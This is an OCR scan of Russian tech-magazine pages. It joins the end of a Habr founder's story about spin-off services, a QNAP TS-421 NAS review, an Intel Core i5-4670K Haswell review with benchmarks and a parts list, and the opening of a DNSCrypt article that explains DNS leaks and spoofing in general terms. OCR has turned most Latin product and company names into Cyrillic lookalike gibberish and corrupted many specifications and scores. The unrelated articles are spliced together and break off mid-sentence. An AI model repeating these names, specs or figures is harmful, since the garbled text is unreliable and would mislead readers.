алгоритма и говорили: «Что это за бред, я не могу это читать, 
я в этом ничего не понимаю, раньше было лучше!» И такое стало 
случаться регулярно. 

Наконец от происходящего я окончательно потерял 
способность нормально спать и бодрствовать. Я посове- 
товался с коллегами, и мы приняли соломоново решение. Мы 
решили децентрализовать Хабр, который до этого был завязан 
на главную страницу. 

Новая система позволяет самому настраивать свою 
ленту и читать то, что хочется. Если тебе что-то не нравится, 
пожалуйста, убери и не читай. 

Это, конечно же, тоже было воспринято в штыки. Было 
много постов, где хоронили Хабр. Вот только после этих изме- 
нений аудитория сайта удвоилась. 

ГИКИ -НАШЕ ВСЕ 

Вскоре появилась идея выстроить «экосистему гиков», 
в которой им было бы интересно и удобно вращаться. 

Для этого нужно было окружить Хабрахабр полезными проек- 
тами-спутниками. 
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Первым стал «Тостер» — наша попытка 
проводить конференции. Мы хотели, чтобы 
гики любили нас еще больше и пользовались 
всем набором сервисов и продуктов, которые 
мы можем предоставить. Самоцели зарабаты- 
вать на этом не было. Конференции — не тот 
бизнес, который будет приносить большие 
деньги и при этом работать сам по себе. Там 
сильна ежедневная рутина — организация виз, 
переговоров, питания и так далее. Но в итоге 
мы поняли, что нормальных площадок в Рос- 
сии просто нет. Решили больше не связываться 
с конференциями, скорее, мы будем помогать 
другим их проводить. 

Вскоре мы реанимируем «Тостер» и на 
его базе запустим свой О&А сервис для раз- 
работчиков. Мы хотим сделать что-то вроде 
русского 51аск ОѵегИоѵѵ. Конечно, в своем пони- 
мании и в своей интерпретации. Сейчас мы уже 
активно тестируем этот продукт. 

Другим проектом стал «Хантим». Он стал абсолютно орга- 
ничным развитием раздела «Работа», который в какой-то момент 
оказался очень зажат внутри большого Хабра и никак не разви- 
вался. Многие хотели бы опубликовать предложения о работе, 
но для этого нужно было проходить регистрацию, инвайты. 

Момент для запуска «Фрилансим» был выбран неслу- 
чайно. Ргее-Іапсе.ги как раз оказался в центре скандала, когда 
они решили выступать посредниками в любой сделке и читали 
переписку пользователей. Буквально за месяц мы с нуля сде- 
лали «Фрилансим». В своем стиле устроили глобальный хака- 
тон — каждый что-то делал, анализировал, программировал, 
писал. Сделали хорошо, но сейчас уже понимаем, что могли 
бы и лучше. Тем не менее у Ргее-Іапсе.ги около 30 тысяч актив- 
ных пользователей, у нас — 15. То есть половину аудитории мы 
у них уже отъели. 



С запуском «Фрилансим» началась 
и история Вгаіпзіогаде. Мы поняли, что есть 
большой спрос на то, чтобы человек мог 
удобным образом представить, что он умеет 
и накопил. Но не в каком-то 1_іпкес!1п-стиле. 
Чтобы несмотря на то, что ты рисуешь кар- 
тинки, а я пишу код, мы могли бы показать 
и рассказать о том, что мы умеем. На карьер- 
ных сайтах ты не сможешь красиво показать 
свои репозитории в ОіЖиЬ или показать, 
какие ты пишешь тексты. Но мы сделали это 
в Вгаіпзіогаде. 

Сейчас там уже 50 тысяч человек, в ос- 
новном это разработчики. Мы и сами не- 
давно закрыли пару вакансий, просто найдя 
людей в этом хаосе, проанализировав то, 
что они представили о себе. Конечно, дальше 
нужно встречаться, проводить собеседова- 
ния, но именно поиск там позволил нам найти 
тех кандидатов, что нам требовались. 

Дополнительные сервисы Хабра мы постепенно выно- 
сим в отдельные проекты. Скорее всего, аналогичным обра- 
зом мы поступим и с разделом «События», где люди публикуют 
информацию о всяких конференциях и других тусовках. Не все 
могут это сделать, многим промоутерам и организаторам 
опять же нужна «виза» на Хабр. 

Отдельная команда разработчиков на ВиЬу оп Паііз 
обеспечивает быструю разработку этих новых сервисных 
проектов. Хотя сам Хабр, где огромные нагрузки, написан 
на РНР. 

После всех пертурбаций мы сделали вывод: нам 
не нужно больше никуда лезть. Мы лучше окопаемся в том 
месте, где уже закрепились. Наша цель сейчас — доминиро- 
вать в своей нише, создавать и поддерживать сервисы для ги- 
ков, делать их счастливыми. Ну и себя, конечно же. 30 
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На Ыпкейіп нельзя 
красиво показать свои 
репозитории в СііНиЬ 
или тексты. Поэто- 
му мы решили сделать 

Вгаіпзіогаде 
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Извечный вопрос: что выбрать — сервер 
собственноручной сборки или готовый ЫА5? 
Много копий сломано на эту тему, и топики 
на форумах стабильно перешагивают сотню 
страниц. Признаться, и я долго был адептом 
олдскульных решений, но в последнее вре- 
мя удобство функционала из коробки побе- 
дило, и я стал присматриваться к МАЗ’ам. 
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ХАРАКТЕРИСТИКИ 

Процессор: МагѵеІІ 2,0 ГГц 

Оперативная память: 1 Гб 

(ООКЗ) 

РІазб -память: 16 Мб 
Дисковое пространство: 4 * 

2,5" или 3,5” Н ЭР с интерфейсом 
5АТА I или 8АТА II 
Слоты для НОО: 4 х слот 
с возможностью горячей замены 
Емкость хранилища: 16 Тб 
Сетевые интерфейсы: 2 * 

РЗ-45 Гигабитный Еібегпеі 
Индикаторы состояния: статус, 
ЦЩ, еЗАТА, 115В, 4 к НРБ 
118В: 2 х 115В 3.0 (сзади), 

2 х ІІ$В 2.0 (спереди: 1; сзади: 

I ), еЗАТА: 2 х е5АТА (сзади) 
Кнопки: питание, резервное 
копирование, сброс 
ЖК-дисплей: монохромный 
дисплей для быстрой настройки 
и системных уведомлений 
Зуммер: системные 
предупреждения 
Операционная система: Ыпих 
Масса: без жестких дисков 3,0 кг 
Уровень шума: 

• При простое: 35,6 дБ 

• В работе: 36,7 дБ (с четырьмя 
установленными дисками 
объемом 0,5 Тб) 

Энергопотребление: 

• В спящем режиме: 13 Вт 

• В работе: 26 Вт (с четырьмя 
установленными дисками 
объемом 0,5 Тб) 

Габариты: 177 х 180 х 235 мм 



ногие (и я в том числе) долгое время были ярыми 
приверженцами зіапбаіопе-сервера — широкие 
возможности настройки позволяли, вооружив- 
_ шись напильником, 53Н и парочкой бессонных 

ночей, собрать своего Франкенштейна. Однако 
время идет, и рынок специально заточенных для этих целей 
устройств — МАб’ов — меняется, и на сегодняшний день со- 
временные ЫАЗ’ы уже из коробки могут предложить тебе бога- 
тый функционал на все случаи жизни. Одно из таких решений — 
четырехдисковый ЫА5Т5-421 от тайваньской компании ОЫАР 

ЗНАКОМСТВО 

ОЫАР Т5-421 — это классический четырехдисковый ЫАЗ 
с возможностью горячей замены дисков. ЫАЗ поддерживает 
как 3,5-, так и 2,5-дюймовые НОЭ/55Э-накопители. Макси- 
мально поддерживаемый объем — 16 Тб. 

На задней панели вертикально расположились два ги- 
габитных ЕШетеТ- интерфейса, три ІІЗВ-порта (два 115В 3.0 
и один 115В 2.0} и пара еЗаІа- разъемов. Расположение пор- 
тов достаточно удобное, кабели нисколько не мешают друг 
другу. Блок питания у Т5-421 внешний. 

На передней панели, кроме индикаторов и еще одного 
115В 2.0, есть небольшой монохромный дисплей для систем- 
ных уведомлений. Кстати, здесь же расположена кнопка бы- 
строго резервного копирования, что достаточно удобно. 

ВСЕ ДЕЛО В СОФТЕ 

Но то, что действительно выделяет этот МАЗ из множества 
других, — это по-настоящему впечатляющий функционал, 
Трудно вообразить протокол или технологию, поддержки ко- 
торой у Т5-421 не было бы заявлено. Этот ЫА5 комфортно чув- 
ствует себя в СІР5/5МВ (ЭР5)-, АРР- и ИРЗ-сетях, из коробки 
работает с РТР и ѴѴеЬЭАѴ и всегда доступен по НТТР/НТТР5, 
Теіпеі; и 55Н. Для своих собственных дисков поддерживаются 
файловые системы ехіЗ и ех!4, для внешних выбор больше — 
еще и ЫТР5, РАТ32 и НР5+. Есть возможность работы с сете- 
выми службами ЭРпР и Вопіоиг, а при желании к ЫАб’у мож- 
но докупить внешний ѴѴі-Рі 802. 11 п УЗВ-адаптер и стримить 
фильмы и сериалы прямо на ТѴ безо всяких проводов. 



Админка — предмет особой гордости разработчиков, 
мало где встретишь настолько простую и мощную систему 
управления сетевым хранилищем. Внешне все работает 
очень плавно, без тормозов, несмотря на обилие графики. 
По функционалу очень похожа на современные мобильные 
ОС, в частности тут есть свой собственный портал бесплат- 
ных приложений и контента в лучших традициях Ріау! и Арр 
Зіоге, А благодаря технологии туОМАРсІоиб есть возмож- 
ность получить удобный доступ к своему контенту и управлять 
им из любого места или устройства, будь то ноутбук, смарт 
или планшет. Кстати, для мобильных устройств подАпбгоісІ и 
Ю5 есть целый набор приложений для обмена фотками, му- 
зыкой и другими файлами, а также для мониторинга системы 
и даже картинок с подключенных ІР- видеокамер. 

НИЧЕГО НЕ ПРОПАДЕТ 

К вопросу резервного копирования данных тайваньцы из 
ОМАР подошли не менее серьезно. Тут есть и репликация 
в реальном времени (РТПП), и репликация ресурсов на уров- 
не блоков. Кнопка копирования данных на передней панели 
позволит быстро закатать бэкап на любое поддерживаемое 
внешнее устройство. Отдельным пунктом стоит отметить 
возможность резервного копирования данных на облачные 
системы хранения данных: Ооодіе Огіѵе, Атагоп 53, Зут^огт 
и ЕІербапШпѵе. Для ѴѴіпсІоѵѵз существует специальное прило- 
жение МеШак РерІісаГог, а если ты пользователь 05 X и при- 
вык работать с Тіпле МасИіпе, то Т5-421 без труда примет бэ- 
кап в ее формате. 

ВЫВОДЫ 

ОМАР Т5-421 произвел впечатление очень продуманного 
и функционального девайса. Если раньше мне часто при- 
ходилось лазить в консоль, чтобы включить ту или иную оп- 
цию в конфигах, то теперь весь зоопарк необходимых мне 
сервисов поднимается и конфигурируется парой опций 
в админке. А доступ через туОМАРсІоисІ сильно облегчает 
жизнь, позволяя быть уверенным в том, что все мои данные 
будут всегда под рукой, экономя время и нервы. А это до- 
рогого стоит. ЭС 





ТЕСТИРОВАНИЕ ПРОЦЕССОРА ІІЧТЕІ_СОВЕ І5-4670К 

Выход процессоров на базе новой архитектуры, будь то АІѴЮ или Іпіеі, — 
это всегда грандиозное событие! И мимо него мы пройти не можем. В на- 
чале июня ІпіеІ наконец-то представила общественности «камни» на базе 
архитектуры НазѵѵеІІ. К изучению новинки мы подошли основательно, 
разделив обзор Соге І5-4670К на три части. В этой статье ты сможешь уз- 
нать про основные новшества, которые преподносит нам НазѵѵеІІ. 



ХАРАКТЕРИСТИКИ 

Кодовое имя: НазѵѵеІІ 
Техпроцесс: 22 нм 
Процессорное гнездо: ША1150 
Число ядер (потоков): 4(4) 
Тактовая частота (ТигЬо ВоозІ 2.0): 
3400 (3800) МГц 
Кеш 1.3: 6 Мб 

Контроллер памяти: ООРІЗ- 

1333/1600 

Линии РС! Ехргезз 3.0: 16 
Встроенное видео: НЭ бгарЫсз 
4600 

ТРР: 84 Вт 



ОН ЕЩЕ ДЕЙСТВУЕТ? 

Как всегда, во время знакомства с новой архитек- 
турой процессоров ІпіеІ мы обращаемся к закону 
Гордона Мура и концепции «тик-так». Не обойдем 
стороной и НазѵѵеІІ. 

Согласно концепции «тик-так», Іпіеі снача- 
ла выпускает процессор на новом техпроцес- 
се, но старой архитектуры («тик»), а затем, на- 
оборот, выпускает процессор на базе все того 
же техпроцесса, но с новой архитектурой («так»). 
Вырисовывается следующая цепочка: 32-на- 

нометровые «камни» архитектуры ѴѴезітѳге — 
«тик-процессоры»; 32-нанометровые Запру 
ВгіРде — «так-процессоры»; 22-нанометровые Іѵу 
ВгіРде — опять «тик-процессоры»; наконец, 22-на- 
нометровые НазѵѵеІІ — «так-процессоры». 

Согласно закону Мура, количество транзисто- 
ров, размещаемых на кристалле СРІІ, удваивает- 



ся каждые 24 месяца. Позже в Іпіеі сделали не- 
большую поправку и уменьшили срок с двух лет 
до полутора, Итак, кристалл Запру ВгіРде имеет 
в своем распоряжении 995 миллионов транзи- 
сторов. В свою очередь, Іѵу ВгіРде при полезной 
площади 160 мм 2 имеет 1400 миллионов кремни- 
евых затворов. Наконец, НазѵѵеІІ имеет площадь 
кристалла 177 мм 2 и 1600 миллионов транзисто- 
ров! 

ВРЕМЯ МЕНЯТЬ АРХИТЕКТУРУ 

Итак, согласно концепции «тик-так», все НазѵѵеІІ 
выполнены на базе 22-нанометрового техно- 
логического процесса. Технология травления 
кремния — та же (логично, ведь по большому 
счету именно для этого в Іп!еІ и разрабатывают 
«тик-процессоры»). Это трехмерные транзисторы 
РіпРЕТ. 



Никуда не делись встроенные контроллер 
памяти ЭОРІЗ и 16 линий РСІ Ехргезз 3.0. Новые 
НазѵѵеІІ поддерживают до 32 Гб ОЗУ. Увеличи- 
лось число множителей памяти: от ОРВЗ-ІЗЗЗ 
до ООКЗ-3200. Линии РСІ Ехргезз традиционно 
могут делиться как пополам, так и согласно схеме 
х4 + х4 + х4 + х4. 

Других архитектурных изменений относи- 
тельно Іѵу Вгісіде, что удивительно, не так много. 
А посему большая часть элементов «плюща» пе- 
рекочевала в НазѵѵеІІ. Однако на некоторые ново- 
введения, направленные на увеличение быстро- 
действия процессоров, стоит обратить внимание. 

Во-первых, НазѵѵеІІ получил несколько новых 
исполнительных устройств и два порта испол- 
нения с переходами и с сохранением адресов. 
На порты «повесили» дополнительные блоки ра- 
боты с целочисленными инструкциями. В итоге 
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кристалл получил сразу четыре целочисленных 
АШ, а сама архитектура стала более гибкой в ра- 
боте с РМА-инструкциями. В теории подобное 
решение должно увеличить производительность 
технологии Нурег-ТИгеасІіпд. 

Во-вторых, у НазѵѵеІІ реализована поддерж- 
ка новых инструкций АѴХ2/РМАЗ, которая рас- 
ширяет и без того большой набор 256-битных 
ЗІІѴЮ-команд, Данные инструкции предназначены 
в первую очередь для высокопроизводительных 
вычислений. Однако профит от внедрения АѴХ2/ 
РМАЗ стоит ждать лишь тогда, когда программи- 
сты начнут использовать их в своем коде. В таком 
случае производительность Н азѵѵе I ! может быть 
увеличена на 30-50% в сравнении с іѵу Вгісіде. 
А это уже серьезный показатель! 

В-третьих, в Наз\л/еІІ улучшено предсказание 
переходов, которое позволит ускорить загрузку 
исполнительных портов. Увеличен размер Ѵ2 ИВ. 
Также в новых процессорах увеличен буфер вне- 
очередного исполнения, который отвечает за ско- 
рость трансляции адресов. 

Наконец, в-четвертых, кеш-память перво- 
го и второго уровней получила вдвое большую 
пропускную способность. Только вот задержки 
при этом остались прежними. Кеш І_1 спосо- 
бен выполнять по два 32-байтных чтения и одну 
32-байтную запись за такт времени. Кеш І_2 спо- 
собен считывать и записывать 64 байта данных 
за такт. Общий кеш І_3 модификации не подвер- 
гнулся, как и кольцевая шина в целом. 

Не только у нас, но и у наших коллег возникли 
сомнения, правильно ли называть НазѵѵеІІ «так- 
процессором», ведь серьезных архитектурных 
изменений и модификаций нет так много. Отсюда 
неудивительно, что НазѵѵеІІ имеет такое крошеч- 
ное преимущество над Іѵу Вгісіде. 

ЗНАКОМИМСЯ С ПРОЦЕССОРАМИ 

Но давай не будем торопить события. Теперь 
поговорим о самих моделях процессоров, вы- 
полненных на базе архитектуры НазѵѵеІІ. На дан- 
ный момент представлено свыше десяти «кам- 
ней», относящихся как к категории Соге і5, так 
и к категории Соге і7. Все — четырехъядерные, 
но Соге І7, как и положено, имеют поддержку 
технологии Нурег-ТІпгеасІіпд. К тому же Соге І7 
имеют увеличенный до 8 Мб кеш третьего уров- 
ня. Соге І5 приходится довольствоваться 6 Мб 
5ВАМ 13. 

Двухъядерные процессоры Соге ІЗ пока 
не представлены. Возможно, часть из них будет 
упаковываться ВСА-пайкой. 



Второй момент — наличие приставок в назва- 
нии СРІІ. Самым быстрым НазѵѵеІІ является Соге 
І7-4770К. Литера «К» в названии говорит о том, 
что процессор имеет разблокированный множи- 
тель. По аналогии с «камнями» архитектуры Запсіу 
Вгісіде и Іѵу Вгісіде в продаже есть просто Соге і7- 
4770, а также СРІІ Соге І7-47705/4770Т с умень- 
шенным до 65 Вт уровнем ТРР. 

С Соге І5 ситуация аналогичная. Прибывший 
к нам в тестовую лабораторию Соге І5-4670К функ- 
ционирует на частоте 3,4 ГГц, но благодаря техно- 
логии ТигЬо Воозі 2.0 скорость работы «камня» 
может быть увеличена до 3,8 ГГц. С учетом того, 
что процессор имеет разблокированный коэффи- 
циент умножения, это не столь важно. 

ВИДЕО -НАШЕ ВСЕ! 

Разговоры про НО Ѳгарілісз 4600 ходят уже давно. 
Кодовое название интегрированного СРІІ — ѲТ2. 
Графика предлагает 20 исполнительных устройств 
(на четыре больше, нежели у ГЮ СгарЬісз 4000), 
а также увеличение производительности блоков 
фиксированной функциональности, текстурных 
семплеров и технологии Оиіск Зупс, К тому же ГЮ 
СгарИісз 4600 обзавелся новыми версиями АРІ: 
ОігесіХ 11.1, ОрепСГ 1 .2, ОрепСЮ 4.0. НЮ ОгарЫсз 
4000 может похвастать поддержкой РІгесіХ 11.0, 
ОрепСП.1 иОрепСИЗ.З. 

По факту НЮ Сгарііісз 4600 на 20-30% бы- 
стрее НЮ Ѳгарбісз 4000. Однако встроенное 
видео НазѵѵеІІ все равно не ровня Насіеоп НР 
76600/86700, используемым в АРІІ Тгіпііу/ 
Вісіііапс! от АІѴЮ. 

Стоит отметить, что вскоре на рынке появят- 
ся системы (скорее всего, моноблоки и НТРС) 
на базе процессора Соге І7-4770П. Этот «ка- 
мень» не будет совместим с процессорным гнез- 
дом 143А1150, но будет упаковываться на плате 
при помощи ВОА-пайки. Этот НазѵѵеІІ получит 
графическое ядро СТЗе с 40 исполнительными 
устройствами и кеш -па мятью четвертого уровня 
на основе ЕтЬесІсІесІ РВАМ. Также сам Соге і7- 
4770Р получит всего 6 Мб кеш-памяти третьего 
уровня. 

МИ НУС ПЯТЬ «НОГ», ПЛЮС СЕМЬ ВАТТ 

Важной особенностью процессоров НазѵѵеІІ яв- 
ляется наличие интегрированного регулятора 
напряжения. В каждом «камне» под теплораспре- 
делительной крышкой находится до двадцати яче- 
ек размером 2,8 мм 2 , а в каждой ячейке — до 16 
виртуальных фаз. Сила тока может достигать вы- 
соких 25 А. С учетом общих 16 ■ 20 = 320 фаз появ- 




Валидация процессора Соге І5-4670К на номиналь- 
ных частотах 



ляется возможность максимально точно дозиро- 
вать энергию определенных частей процессора. 
Чуть забегая вперед, отметим, что одновременно 
с процессором к нам на тест прибыла материн- 
ская плата АЗГІЗ 287ЮЕШХЕ, которая, как и по- 
ложено, имеет свои цифровые стабилизаторы 
напряжения ѴСоге вкупе с шестнадцатью фазами 
питания. По большому счету теперь процессоры 
НазѵѵеІІ могут отказаться от подобных услуг. От ма- 
теринки лишь требуется стабильная подача напря- 
жения в размере 1,8 В. 

Думаем, уже вместе с архитектурой ВгоасІѵѵеІІ 
встроенный контроллер напряжения будет инте- 
грирован непосредственно в кристалл. 

Интегрированный преобразователь напряже- 
ния повлиял на общий уровень потребления энер- 
гии новых процессоров. Так, уровень ТОР Соге і5- 
4670К составляет 84 Вт, что на 7 Вт выше, нежели 
у Соге І5-3570К. Однако примечательно, что на ко- 
робке, в которой лежали сам процессор и кулер, 
было написано следующее: «І5-4670К, 3.4 ОНг, 
6МВ СасМе, (_С1150, 95ѴѴ», Однако! Максимальная 
допустимая температура Соге І5-4670К не должна 
превышать отметки 100 градусов по шкале Цель- 
сия. 

Второй момент. Скорее всего, именно в связи 
с интеграцией встроенного регулятора напряже- 
ния инженерам ІпіеІ пришлось использовать дру- 
гую «упаковку» — ЮА1150. Очевидно, что НазѵѵеІІ 



СБОРКА ТОПОВОГО ПК НА БАЗЕ НАЗѴѴЕІІ 

Конечно же, все ведущие сборщики персональных компьютеров уже предло- 
жили свои системы на базе процессоров НазѵѵеІІ. И если у тебя возникло жела- 
ние самостоятельно собрать подобную систему, то рекомендуем приобрести 
следующие комплектующие: 

Процессор: ІпіеІ Соге І5-4670К (8000 рублей) 

Процессорный кулер: ТііегтаІгідМі НЯ-02 (1700 рублей) 

Материнская плата: МЗІ 287-С065 САМІМС (6500 рублей) 

Оперативная память: Кіпдзіоп КНХ21С11ТЗК2/16Х{5000 рублей) 
Видеокарта: МЗІ СеРогсе СТХ770САМІ1ЧС (15 000 рублей) 

Твердотельный накопитель: РІехіог РХ-128М5Р (4500 рублей) 

Жесткий диск ѴѴезіегп Оідііаі ѴѴР20Е2ПХ (3000 рублей) 

Блок питания: Тіпегтаііаке Тоидброѵѵег ОгапеІ 650 Вт (5000 рублей) 

Корпус: Уап Ц РС-7НВ (4000 рублей) 

Итого: 52 700 рублей 






і / 



Сергей Плотников 
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Ргосеззог 

СгарМсз 






Кристалл двухъядерного и четырехъядерного НавѵѵеІІ 



Сравнение ядра Іѵу Вгісіде (сверху) с НазѵѵеІІ (снизу). Найди десять отличий 



несовместим с 1_СА1155. Поэтому в любом случае 
придется брать плату на базе новых чипсетов 287/ 
Н87/087/В85 Ехргезз. Сплошные траты! Подроб- 
нее о логике 287/Н87 Ехргезз читай в обзоре мате- 
ринской платы А51І5 287-ОЕШХЕ. 

ГОРЕЛУКОВОЕ 

В рамках статьи мы поговорили о новой архитек- 
туре НазѵѵеІІ и протестировали процессор Соге 
І5-4670К. Однако с учетом того, что тенденции 
формирования моделей ОРУ не изменились 
и Соге І7-4770К — тот же четырехъядерник, толь- 
ко с Нурег-ТИгеасІіпд, 8 Мб кеш -памяти третьего 
уровня, функционирующий на частоте 3,5 ГГц, 
можно судить и о нем. Повторимся, ряд десктоп- 
ных процессоров Іпіеі логичен и понятен. Оче- 
видно, что большим спросом будет пользоваться 
именно Соге І5-4670К, так как по большому счету 
от Нурег-Тйгеасііпд хотя бы в тех же компьютерных 
играх толку нет. На номинальную тактовую частоту, 
уверены, матерый техноманьяк не смотрит — раз- 
гон решит все проблемы. 

Сравнивая Соге І5-4670К с Соге І5-3570К, мы 
видим печальную во многом ситуацию: прирост 



производительности в х86- приложениях состав- 
ляет жалкие 5-10%. Думаем, что аналогичная кар- 
тина будет, если сравнить Соге І7-4770К с Соге і7- 
3770К. Да, НИ Ѳгарііісз 4600 в среднем на 20-30% 
быстрее НОѲгарИісз4000, но, во-первых, если мы 
говорим о десктопных процессорах, энтузиастам 
по большому счету от этого ни тепло, ни холод- 
но. Во-вторых, 6Т2 все равно уступает решениям 
от АМР. 

А теперь предварительные итоги. Десктоп- 
ные НазѵѵеІІ — настоящий катализатор всего 
того, что сейчас происходит в Іпіеі. После ухо- 
да Пола Отеллини (РаиІ 5. ОІеІІіпі) и назначения 
на пост СЕО Брайана Кржанича (Вгіап Кггапісіі) 
стало ясно, что все силы компании будут бро- 
шены на развитие мобильных процессоров. За- 
дачка сложная, с учетом того, какие обороты на- 
брала британская АНМ. Так что техноманьякам 
и энтузиастам придется довольствоваться тем, 
что есть. Мы, откровенно говоря, расстроены. 
Однако окончательное впечатление о НазѵѵеІІ 
должно сложиться после знакомства с ноутбуч- 
ными «камнями» и предложениями для мобиль- 
ного сегмента. 



Не забываем, что в сегменте х86-вычислений 
все никак не может навязать нормальной конку- 
ренции, по сути, единственный противник ІпіеІ — 
АМР. А как известно, конкуренция — двигатель 
прогресса. Поэтому мы с нетерпением ждем 
анонса АМР ЗІеатгоІІег, 

А пока констатируем тот факт, что обладателям 
систем на базе Запсіу Вгісіде, Запсіу Вгісіде-Е и Іѵу 
Вгібде элементарно нет никакого смысла перехо- 
дить на НазѵѵеІІ. Прирост производительности — 
мизерный (в случае с шестиядерными Запсіу 
Вгісіде-Е в многопоточных приложениях его нет 
вовсе). При этом к новому процу потребуется до- 
купить матер инку на базе логики 287/Н87 Ехргезз. 
На момент тестирования процессора самой де- 
шевой платой, если верить ресурсу «Яндекс. Мар- 
кет», считалась М5І Н87М-ЕЗЗ стоимостью 2500 
рублей. Прибавляем стоимость «матери» к стои- 
мости процессора. Нетрудно догадаться, что ре- 
шение посерьезней, которое позволит еще и ра- 
зогнать НазѵѵеІІ, будет стоить как минимум вдвое 
дороже. Хорошо, что хоть кулеры с поддержкой 
1_СА1155/1156 совместимы с ЦЗА1150. Хотя, к раз- 
гону НазѵѵеІІ, кстати, тоже есть претензии. ІИ 



РЕЗУЛЬТАТЫ 

ТЕСТИРОВАНИЯ 



ЗирегРІ 1.5X8, 1т: 08,658 с 
Зирег Р1 1 ,5X8, 32т: 7 мин 34,382 с 
ѵѵРгіте 1.55, 32т: 7,205 с 
ѵѵРгіте 1.55, 1024т: 221,973 с 
ШіпПАН 4.2: 5631 Кб/с 

С№ЕВЕІѴСН В11.5, СРЕІ, ОрепСІ: 7,07 різ, 30,7 
РР5 

ЗОМагк Ѵапіаде, аІІ/бРІІ/СРІІ: 6581 /5296/24 194 
балла 

ЗОМагк СІоиб даіе, аІІ/д гарбісз/рбувісз : 

6849/7916/4654 балла 

ЗОМагк Ісе Зіогт, аІІ/дгарМісз/рГіузісз: 

46 035/53 131/31 372 балла 
ЗОМагк Ріге $ігіке, аІІ/дгарбісз/рЬузісз: 
844/933/6452 балла 

Неаѵеп 4.0, Ьазіс/ехігете: 566/125 баллов 
РагСгу 3, 1280 * 1024, высоко, N 0 АА, Ыо АР: 

15,3 РР8 



ИСТОРИЯ ПОВТОРЯЕТСЯ 



И снова у ІпіеІ возникли проблемы с чипсетами. На этот раз неприятная оказия 
может произойти с 115В 3.0. Дело в том, что микросхемы ревизии С1 во время 
вхождения системы в режим сна могут переставать видеть некоторые порты. 
Во время пробуждения ІІЗВ-разъемы снова определяются. Ошибка некритич- 
ная, однако с обновлением ревизии до версии С2 будет исправлена. 

Напомним, что одновременно с анонсом Запсіу Вгісіде была обнаружена 
ошибка чипсета Р67 Ехргезз, в котором некорректно работали порты ЗАТА ІІ. 
Іпіеі достаточно оперативно выпустила новую ревизию микросхемы, а произ- 
водители материнских плат — устройства с приставкой ВЗ. 
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Соге луковое 



ѴѴРРІМЕ 1.55 1024М, С 



Іпіеі Соге І5-4670К 
Іпіеі Соге І7-3770 
Іпіеі Соге І7-3960Х 
Іпіеі Соге І7-2600К 
Іпіеі Соге І5-2500К 
Іпіеі Соге 15-2400 
АМО РХ-3150 

АМО РПепот II Х6 1090Т ВЁ 
АМО Рііепот II Х4 970 ВЕ 
АМР А8-3850 




Сравнение процессоров в ѵѵРгіте 



500 



ѴѴШРАР, КБ/С 



Іпіеі Соге І5-4670К 
Іпіеі Соге І7-3770 
Іпіеі Соге І7-3960Х 
Іпіеі Соге І7-2600К 
Іпіеі Соге І5-2500К 
Іпіеі Соге 15-2400 
АМО РХ-3150 

АМй Рііепот II Х6 1090ТВЕ 
АМО Рііепот II Х4 970 ВЕ 
АМО А8-3850 




Сравнение процессоров в ѴѴіпПАР 



7000 



ЭРМАКК ПРЕ ЕТРІКЕ, БАЛЛЫ 



НЭ Ѳгаріііся 4600 (Соге І5-4670К} 
НО Сгарііісб 4000 (Соге І7-3770) 
Расіеоп НО 86700 (АМО А1 0-6700) 





1000 






1200 



Сравнение НО СгарЫсз 4600 с НО СгарИісз 4000 и Расіеоп НО 86700 в бенчмарке ЗОМагк Ріге 51гіке. 
Как видишь, встроенное видео «камней» Іпіеі прилично уступает графике АРЫ АМО 
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Используя ѴРМ, ты думаешь, что за то- 
бой никто не подсматривает и передава- 
емые данные защищены? Ты ошибаешь- 
ся. Сейчас попробую объяснить почему. 




Денис Колисниченко 





ВКРАТЦЕ О ОЫЗСКѴРТ 

При использовании НТТРЗ или 381. твой НТТР- 
трафик зашифрован, то есть защищен. Когда 
ты используешь ѴРІЧ, шифруется уже весь твой 
трафик (конечно, все зависит от настроек ѴРМ, но, 
как правило, так оно и есть). Но иногда, даже ког- 
да используется ѴРКІ, твои ОМЗ-запросы не за- 
шифрованы, они передаются как есть, что откры- 
вает огромное пространство для «творчества», 
включая МІТМ-атаки, перенаправление трафика 
и многое другое. 

Тут на помощь приходит опенсорсная утили- 
та ОМЗСгурТ разработанная хорошо известными 
тебе создателями ОрепЭІЧЗ, — программа, по- 
зволяющая шифровать ОМЗ-запросы. После ее 
установки на компьютер твои соединения так- 
же будут защищены и ты сможешь более без- 
опасно бороздить просторы интернета. Конечно, 
РЫЗСгурІ — это не панацея от всех проблем, 
а только одно из средств обеспечения безопас- 
ности. Для шифрования всего трафика все еще 
нужно использовать ѴРМ-соединение, но в паре 
с ЭЫЗСгур!: будет безопаснее. Если тебя такое 
краткое объяснение устроило, можешь сразу пе- 
реходить к разделу, где я буду описывать установ- 
ку и использование программы. 



ДЛЯ НАСТОЯЩИХ ПАРАН О И КО В 

Попробуем разобраться глубже. Этот раздел 
предназначен для настоящих параноиков. Если 
ты ценишь свое время, тогда можешь сразу 
перейти к установке программы. 

Итак, как говорится, лучше один раз увидеть, 
чем сто раз услышать. Посмотри на рисунок 1 . До- 
пустим, клиент (ноутбук на рисунке) пытается об- 
ратиться к бкѵѵз.огд.иа. Первым делом он должен 
разрешить символьное имя узла в ІР-адрес. Если 
же конфигурация сети такова, что используется 
ЭЫЗ-сервер провайдера (незашифрованное со- 
единение, красная линия на рисунке), то разре- 
шение символьного имени в ІР-адрес происходит 
по незашифрованному соединению. 

Да, какие данные ты будешь передавать 
на сікшз.огд.иа, никто не узнает. Но есть несколь- 
ко очень неприятных моментов. Во-первых, про- 
вайдер, просмотрев логи ОИЗ, сможет узнать, 
какие сайты ты посещал. Тебе это нужно? Во- 
вторых, вероятна возможность атак РИЗ-спуфинг 
и ОЫЗ-снупинг. Подробно описывать их не буду, 
об этом уже написано множество статей. В двух 
словах ситуация может быть следующей: некто 
между тобой и провайдером может перехватить 
ОИЗ-запрос (а так как запросы не шифруются, 



то перехватить запрос и прочитать его содер- 
жимое не составит никакого труда) и отправить 
тебе «поддельный» ответ. В результате вместо 
того, чтобы посетить бк\л/5.огд.иа, ты перейдешь 
на сайт злоумышленника, как две капли воды по- 
хожий на тот, который тебе нужен, введешь свой 
пароль от форума, ну а дальше развитие событий, 
думаю, ясно. 

Описанная ситуация называется ЭІМЗ Іеакіпд 
(«утечка РЫЗ»). йЫЗ Іеакіпд происходит, когда 
твоя система даже после соединения с ѴРІМ- 
сервером или Тог продолжает запрашивать РЫЗ- 
серверы провайдера для разрешения доменных 
имен. Каждый раз, когда ты посещаешь новый 
сайт, соединяешься с новым сервером или запу- 
скаешь какое-то сетевое приложение, твоя систе- 
ма обращается к ОЫЗ провайдера, чтобы разре- 
шить имя в ІР. В итоге твой провайдер или любой 
